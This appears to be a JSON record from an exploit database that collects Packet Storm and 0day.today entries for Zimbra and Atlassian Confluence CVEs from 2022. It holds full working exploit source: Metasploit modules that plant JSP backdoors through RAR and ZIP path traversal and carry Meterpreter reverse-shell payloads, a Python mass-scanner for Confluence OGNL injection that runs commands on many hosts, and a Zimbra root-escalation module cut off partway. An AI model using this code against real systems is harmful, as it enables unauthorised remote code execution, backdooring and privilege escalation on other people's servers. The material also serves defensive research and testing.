"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-08-05T00:00:00", "id": "PACKETSTORM:167989", "href": "https://packetstormsecurity.com/files/167989/Zimbra-UnRAR-Path-Traversal.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Format::RarSymlinkPathTraversal \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)', \n'Description' => %q{ \nThis module creates a RAR file that can be emailed to a Zimbra server \nto exploit CVE-2022-30333. If successful, it plants a JSP-based \nbackdoor in the public web directory, then executes that backdoor. \n \nThe core vulnerability is a path-traversal issue in unRAR that can \nextract an arbitrary file to an arbitrary location on a Linux system. \n \nThis issue is exploitable on the following versions of Zimbra, provided \nUnRAR version 6.11 or earlier is installed: \n \n* Zimbra Collaboration 9.0.0 Patch 24 (and earlier) \n* Zimbra Collaboration 8.8.15 Patch 31 (and earlier) \n}, \n'Author' => [ \n'Simon Scannell', # Discovery / initial disclosure (via Sonar) \n'Ron Bowes', # Analysis, PoC, and module \n], \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2022-30333'], \n['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'], \n['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'], \n['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'], \n['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'], \n['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'], \n], \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => [ \n[ 'Zimbra Collaboration Suite', {} ] \n], \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', \n'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/', \n'TARGET_FILENAME' => nil, \n'DisablePayloadHandler' => false, \n'RPORT' => 443, \n'SSL' => true \n}, \n'Stance' => Msf::Exploit::Stance::Passive, \n'DefaultTarget' => 0, \n'Privileged' => false, \n'DisclosureDate' => '2022-06-28', \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']), \n \n# Separating the path, filename, and extension allows us to randomize the filename \nOptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\").']), \nOptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']), \n] \n) \n \nregister_advanced_options( \n[ \nOptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']), \nOptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]), \n \n# Took this from multi/handler \nOptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]), \nOptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ]) \n] \n) \nend \n \n# Generate an on-system filename using datastore options \ndef generate_target_filename \nif datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp') \nprint_Warning('TARGET_FILENAME does not end with .jsp, was that intentional?') \nend \n \nFile.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || \"#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp\") \nend \n \n# Normalize the path traversal and figure out where it is relative to the web root \ndef zimbra_get_public_path(target_filename) \n# Normalize the path \nnormalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath \n \n# Figure out where it is, relative to the webroot \nwebroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/') \nrelative_path = normalized_path.relative_path_from(webroot) \n \n# Hopefully, we found a path from the webroot to the payload! \nif relative_path.to_s.start_with?('../') \nreturn nil \nend \n \nrelative_path \nend \n \ndef exploit \nprint_status('Encoding the payload as a .jsp file') \npayload = Msf::Util::EXE.to_jsp(generate_payload_exe) \n \n# Create a file \ntarget_filename = generate_target_filename \nprint_status(\"Target filename: #{target_filename}\") \n \nbegin \nrar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload) \nrescue StandardError => e \nfail_with(Failure::BadConfig, \"Failed to encode RAR file: #{e}\") \nend \n \nfile_create(rar) \n \nprint_good('File created! Email the file above to any user on the target Zimbra server') \n \n# Bail if they don't want the payload triggered \nreturn unless datastore['TRIGGER_PAYLOAD'] \n \n# Get the public path for triggering the vulnerability, terminate if we \n# can't figure it out \npublic_filename = zimbra_get_public_path(target_filename) \nif public_filename.nil? \nprint_warning('Could not determine the public web path, disabling payload triggering') \nreturn \nend \n \nregister_file_for_cleanup(target_filename) \n \ninterval = datastore['CheckInterval'].to_i \nprint_status(\"Trying to trigger the backdoor @ #{public_filename} every #{interval}s [backgrounding]...\") \n \n# This loop is mostly from `multi/handler` \nstime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i \ntimeout = datastore['ListenerTimeout'].to_i \nloop do \nbreak if session_created? \nbreak if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i) \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(public_filename) \n) \n \nunless res \nfail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload') \nend \n \nRex::ThreadSafe.sleep(interval) \nend \nend \nend \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/167989/zimbra_unrar_cve_2022_30333.rb.txt"}, {"lastseen": "2022-06-07T16:53:40", "description": "", "cvss3": {}, "published": "2022-06-07T00:00:00", "type": "packetstorm", "title": "Confluence OGNL Injection Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T00:00:00", "id": "PACKETSTORM:167430", "href": "https://packetstormsecurity.com/files/167430/Confluence-OGNL-Injection-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python3 \n \n# Exploit Title: Confluence Pre-Auth Remote Code Execution via OGNL Injection \n# Google Dork: N/A \n# Date: 06/006/2022 \n# Exploit Author: h3v0x \n# Vendor Homepage: https://www.atlassian.com/ \n# Software Link: https://www.atlassian.com/software/confluence/download-archives \n# Version: All < 7.4.17 versions before 7.18.1 \n# Tested on: - \n# CVE : CVE-2022-26134 \n# https://github.com/h3v0x/CVE-2022-26134 \n \nimport sys \nimport requests \nimport optparse \nimport multiprocessing \n \nfrom requests.packages import urllib3 \nfrom requests.exceptions import MissingSchema, InvalidURL \nurllib3.disable_warnings() \n \nrequestEngine = multiprocessing.Manager() \nsession = requests.Session() \n \nglobal paramResults \nparamResults = requestEngine.list() \nglobals().update(locals()) \n \ndef spiderXpl(url): \nglobals().update(locals()) \nif not url.startswith('http'): \nurl='http://'+url \n \nheaders = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\", \n\"Connection\": \"close\", \n\"Accept-Encoding\": \"gzip, deflate\"} \n \ntry: \nresponse = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False) \nif(response.status_code == 302): \nprint('Found: '+url+' // '+ response.headers['X-Cmd-Response']) \n \ninputBuffer = str(response.headers['X-Cmd-Response']) \nparamResults.append('Vulnerable application found:'+url+'\\n''Command result:'+inputBuffer+'\\n') \nelse: \npass \n \nexcept requests.exceptions.ConnectionError: \nprint('[x] Failed to Connect: '+url) \npass \nexcept multiprocessing.log_to_stderr: \npass \nexcept KeyboardInterrupt: \nprint('[!] Stoping exploit...') \nexit(0) \nexcept (MissingSchema, InvalidURL): \npass \n \n \ndef banner(): \nprint('[-] CVE-2022-26134') \nprint('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \\n') \n \n \ndef main(): \nbanner() \n \nglobals().update(locals()) \n \nsys.setrecursionlimit(100000) \n \nif not optionsOpt.filehosts: \nurl = optionsOpt.url \nspiderXpl(url) \nelse: \nf = open(optionsOpt.filehosts) \nurls = map(str.strip, f.readlines()) \n \nmultiReq = multiprocessing.Pool(optionsOpt.threads_set) \ntry: \nmultiReq.map(spiderXpl, urls) \nmultiReq.close() \nmultiReq.join() \nexcept UnboundLocalError: \npass \nexcept KeyboardInterrupt: \nexit(0) \n \n \nif optionsOpt.output: \nprint(\"\\n[!] Saving the output result in: %s\" % optionsOpt.output) \n \nwith open(optionsOpt.output, \"w\") as f: \nfor result in paramResults: \nf.write(\"%s\\n\" % result) \nf.close() \n \nif __name__ == \"__main__\": \nparser = optparse.OptionParser() \n \nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help='Base target uri (ex. http://target-uri/)') \nparser.add_option('-f', '--file', dest=\"filehosts\", help='example.txt') \nparser.add_option('-t', '--threads', dest=\"threads_set\", type=int,default=10) \nparser.add_option('-m', '--maxtimeout', dest=\"timeout\", type=int,default=8) \nparser.add_option('-o', '--output', dest=\"output\", type=str, default='exploit_result.txt') \nparser.add_option('-c', '--cmd', dest=\"command\", type=str, default='id') \noptionsOpt, args = parser.parse_args() \n \nmain() \n \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/167430/CVE-2022-26134.py.txt"}, {"lastseen": "2022-06-08T16:37:11", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-08T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence Namespace OGNL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-08T00:00:00", "id": "PACKETSTORM:167449", "href": "https://packetstormsecurity.com/files/167449/Atlassian-Confluence-Namespace-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Atlassian Confluence Namespace OGNL Injection', \n'Description' => %q{ \nThis module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to \nevaluate an OGNL expression resulting in OS command execution. \n}, \n'Author' => [ \n'Unknown', # exploited in the wild \n'bturner-r7', \n'jbaines-r7', \n'Spencer McIntyre' \n], \n'References' => [ \n['CVE', '2021-26084'], \n['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'], \n['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'], \n['URL', 'https://github.com/jbaines-r7/through_the_wire'], \n['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis'] \n], \n'DisclosureDate' => '2022-06-02', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :dropper \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 8090 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nversion = get_confluence_version \nreturn CheckCode::Unknown unless version \n \nvprint_status(\"Detected Confluence version: #{version}\") \nheader = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\" \nres = inject_ognl('', header: header) # empty command works for testing, the header will be set \n \nreturn CheckCode::Unknown unless res \n \nunless res && res.headers.include?(header) \nreturn CheckCode::Safe('Failed to test OGNL injection.') \nend \n \nCheckCode::Vulnerable('Successfully tested OGNL injection.') \nend \n \ndef get_confluence_version \nreturn @confluence_version if @confluence_version \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'login.action') \n) \nreturn nil unless res&.code == 200 \n \npoweredby = res.get_xml_document.xpath('//ul[@id=\"poweredby\"]/li[@class=\"print-only\"]/text()').first&.text \nreturn nil unless poweredby =~ /Confluence (\\d+(\\.\\d+)*)/ \n \n@confluence_version = Rex::Version.new(Regexp.last_match(1)) \n@confluence_version \nend \n \ndef exploit \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :cmd \nexecute_command(payload.encoded) \nwhen :dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nheader = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\" \nres = inject_ognl(cmd, header: header) \n \nunless res && res.headers.include?(header) \nfail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\") \nend \n \nvprint_good(\"Successfully executed command: #{cmd}\") \nres.headers[header] \nend \n \ndef inject_ognl(cmd, header:) \nsend_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'), \n'headers' => { header => cmd } \n) \nend \n \ndef ognl_payload(_cmd, header:) \n<<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '') \n${ \nClass.forName(\"com.opensymphony.webwork.ServletActionContext\") \n.getMethod(\"getResponse\",null) \n.invoke(null,null) \n.setHeader(\"#{header}\", \nClass.forName(\"javax.script.ScriptEngineManager\") \n.newInstance() \n.getEngineByName(\"js\") \n.eval(\"java.lang.Runtime.getRuntime().exec([ \n#{target['Platform'] == 'win' ? \"'cmd.exe','/c'\" : \"'/bin/sh','-c'\"}, \ncom.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}') \n]); '#{Faker::Internet.uuid}'\") \n) \n} \nOGNL \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167449/atlassian_confluence_namespace_ognl_injection.rb.txt"}], "zdt": [{"lastseen": "2023-06-03T16:28:41", "description": "This Metasploit module POSTs a ZIP file containing path traversal characters to the administrator interface for Zimbra Collaboration Suite. If successful, it plants a JSP-based backdoor within the web directory, then executes it. The core vulnerability is a path traversal issue in Zimbra Collaboration Suite's ZIP implementation that can result in the extraction of an arbitrary file to an arbitrary location on the host. This issue is exploitable on Zimbra Collaboration Suite Network Edition versions 9.0.0 Patch 23 and below as well as Zimbra Collaboration Suite Network Edition versions 8.8.15 Patch 30 and below.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-25T00:00:00", "type": "zdt", "title": "Zimbra Zip Path Traversal Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-25T00:00:00", "id": "1337DAY-ID-37925", "href": "https://0day.today/exploit/description/37925", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/zip'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)',\n 'Description' => %q{\n This module POSTs a ZIP file containing path traversal characters to\n the administrator interface for Zimbra Collaboration Suite. If\n successful, it plants a JSP-based backdoor within the web directory, then\n executes it.\n\n The core vulnerability is a path-traversal issue in Zimbra Collaboration Suite's\n ZIP implementation that can result in the extraction of an arbitrary file\n to an arbitrary location on the host.\n\n This issue is exploitable on the following versions of Zimbra:\n\n * Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)\n * Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)\n\n Note that the Open Source Edition is not affected.\n },\n 'Author' => [\n 'Volexity Threat Research', # Initial writeup\n \"Yang_99's Nest\", # PoC\n 'Ron Bowes', # Analysis / module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-27925'],\n ['CVE', '2022-37042'],\n ['URL', 'https://blog.zimbra.com/2022/03/new-zimbra-patches-9-0-0-patch-24-and-8-8-15-patch-31/'],\n ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa22-228a'],\n ['URL', 'https://www.yang99.top/index.php/archives/82/'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31'],\n ],\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n [ 'Zimbra Collaboration Suite', {} ]\n ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbraAdmin/public/',\n 'TARGET_FILENAME' => nil,\n 'RPORT' => 7071,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => '2022-05-10',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options(\n [\n OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\").']),\n OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),\n OptString.new('TARGET_USERNAME', [ true, 'The target user, must be valid on the Zimbra server', 'admin']),\n ]\n )\n end\n\n # Generate an on-system filename using datastore options\n def generate_target_filename\n if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')\n print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')\n end\n\n File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || \"#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp\")\n end\n\n # Normalize the path traversal and figure out where it is relative to the web root\n def zimbra_get_public_path(target_filename)\n # Normalize the path\n normalized_path = Pathname.new(File.join('/opt/zimbra/log', target_filename)).cleanpath\n\n # Figure out where it is, relative to the webroot\n webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/')\n relative_path = normalized_path.relative_path_from(webroot)\n\n # Hopefully, we found a path from the webroot to the payload!\n if relative_path.to_s.start_with?('../')\n return nil\n end\n\n relative_path\n end\n\n def exploit\n print_status('Encoding the payload as a .jsp file')\n payload = Msf::Util::EXE.to_jsp(generate_payload_exe)\n\n # Create a file\n target_filename = generate_target_filename\n print_status(\"Target filename: #{target_filename}\")\n\n # Create a zip file\n zip = Rex::Zip::Archive.new\n zip.add_file(target_filename, payload)\n data = zip.pack\n\n print_status('Sending POST request with ZIP file')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => \"/service/extension/backup/mboximport?account-name=#{datastore['TARGET_USERNAME']}&ow=1&no-switch=1&append=1\",\n 'data' => data\n )\n\n # Check the response\n if res.nil?\n fail_with(Failure::Unreachable, \"Could not connect to the target port (#{datastore['RPORT']})\")\n elsif res.code == 404\n fail_with(Failure::NotFound, 'The target path was not found, target is probably not vulnerable')\n elsif res.code != 401\n print_warning(\"Unexpected response from the target (expected HTTP/401, got HTTP/#{res.code}) - exploit likely failed\")\n end\n\n # Get the public path for triggering the vulnerability, terminate if we\n # can't figure it out\n public_filename = zimbra_get_public_path(target_filename)\n if public_filename.nil?\n fail_with(Failure::BadConfig, 'Could not determine the public web path, maybe you need to traverse further back?')\n end\n\n register_file_for_cleanup(target_filename)\n\n print_status(\"Trying to trigger the backdoor @ #{public_filename}\")\n\n # Trigger the backdoor\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(public_filename)\n )\n\n if res.nil?\n fail_with(Failure::Unreachable, 'Could not connect to trigger the payload')\n elsif res.code == 200\n print_good('Successfully triggered the payload')\n elsif res.code == 404\n fail_with(Failure::Unknown, \"Payload was not uploaded, the server probably isn't vulnerable\")\n else\n fail_with(Failure::Unknown, \"Could not connect to the server to trigger the payload: HTTP/#{res.code}\")\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/37925", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:04:51", "description": "This Metasploit module exploits CVE-2022-37393, which is a vulnerability in Zimbra's sudo configuration that permits the zimbra user to execute the zmslapd binary as root with arbitrary parameters. As part of its intended functionality, zmslapd can load a user-defined configuration file, which includes plugins in the form of .so files, which also execute as root.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-10T00:00:00", "type": "zdt", "title": "Zimbra zmslapd Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-37393"], "modified": "2022-08-10T00:00:00", "id": "1337DAY-ID-37907", "href": "https://0day.today/exploit/description/37907", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Compile\n include Msf::Post::Linux::Kernel\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Zimbra zmslapd arbitrary module load',\n 'Description' => %q{\n This module exploits CVE-2022-37393, which is a vulnerability in\n Zimbra's sudo configuration that permits the zimbra user to execute\n the zmslapd binary as root with arbitrary parameters. As part of its\n intended functionality, zmslapd can load a user-defined configuration\n file, which includes plugins in the form of .so files, which also\n execute as root.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Darren Martyn', # discovery and poc\n 'Ron Bowes', # Module\n ],\n 'DisclosureDate' => '2021-10-27',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Privileged' => true,\n 'References' => [\n [ 'CVE', '2022-37393' ],\n [ 'URL', 'https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/' ],\n ],\n 'Targets' => [\n [ 'Auto', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ IOC_IN_LOGS ]\n }\n )\n )\n register_options [\n OptString.new('SUDO_PATH', [ true, 'Path to sudo executable', 'sudo' ]),\n OptString.new('ZIMBRA_BASE', [ true, \"Zimbra's installation directory\", '/opt/zimbra' ]),\n ]\n register_advanced_options [\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n end\n\n # Because this isn't patched, I can't say with 100% certainty that this will\n # detect a future patch (it depends on how they patch it)\n def check\n # Sanity check\n if is_root?\n fail_with(Failure::None, 'Session already has root privileges')\n end\n\n unless file_exist?(\"#{datastore['ZIMBRA_BASE']}/libexec/zmslapd\")\n print_error(\"zmslapd executable not detected: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd (set ZIMBRA_BASE if Zimbra is installed in an unusual location)\")\n return CheckCode::Safe\n end\n\n unless command_exists?(datastore['SUDO_PATH'])\n print_error(\"Could not find sudo: #{datastore['SUDOPATH']} (set SUDO_PATH if sudo isn't in $PATH)\")\n return CheckCode::Safe\n end\n\n # Run `sudo -n -l` to make sure we have access to the target command\n cmd = \"#{datastore['SUDO_PATH']} -n -l\"\n print_status \"Executing: #{cmd}\"\n output = cmd_exec(cmd).to_s\n\n if !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required')\n print_error('Current user could not execute sudo -l')\n return CheckCode::Safe\n end\n\n if !output.include?(\"(root) NOPASSWD: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd\")\n print_error('Current user does not have access to run zmslapd')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n base_dir = datastore['WritableDir'].to_s\n unless writable?(base_dir)\n fail_with(Failure::BadConfig, \"#{base_dir} is not writable\")\n end\n\n # Generate a random directory\n exploit_dir = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\"\n if file_exist?(exploit_dir)\n fail_with(Failure::BadConfig, 'Exploit dir already exists')\n end\n\n # Create the directory and get ready to remove it\n print_status(\"Creating exploit directory: #{exploit_dir}\")\n mkdir(exploit_dir)\n register_dir_for_cleanup(exploit_dir)\n\n # Generate some filenames\n library_name = \".#{rand_text_alphanumeric(5..10)}.so\"\n library_path = \"#{exploit_dir}/#{library_name}\"\n config_name = \".#{rand_text_alphanumeric(5..10)}\"\n config_path = \"#{exploit_dir}/#{config_name}\"\n\n # Create the .conf file\n config = 